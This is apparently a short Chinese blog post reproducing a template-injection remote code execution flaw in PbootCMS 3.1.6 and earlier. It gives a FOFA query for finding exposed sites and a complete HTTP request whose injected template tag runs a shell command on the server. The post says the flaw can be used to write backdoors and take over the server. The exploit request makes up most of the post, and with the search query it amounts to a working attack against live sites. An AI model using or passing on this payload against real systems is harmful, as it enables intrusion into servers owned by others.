Babing
Published on 2024-08-30 / 11 Visits
0
0

P7-2Pboot-CMS-RCE

P7-2Pboot-CMS-RCE

漏洞描述:

PbootCMS v<=3.1.6版本中存在模板注入,攻击者可构造特定的链接利用该漏洞,执行任意代码,写入后门,获取服务器权限,进而控制整个web服务器

网站图片:

image-20240625132741082

网络测绘:

fofa语法:

FOFA:app=“PbootCMS-PHP网站开发管理系统”

漏洞复现:

payload:

GET /?member/login/?suanve=}{pboot:if((get_lg/*suanve-*/())/**/(get_backurl/*suanve-*/()))}123321suanve{/pboot:if}&backurl=;ls HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cookie: PbootSystem=qndt58bje3pulluvsp8g2krv4u;lg=system
Accept-Encoding: gzip
Connection: close

效果图:
image-20240619151333879


Comment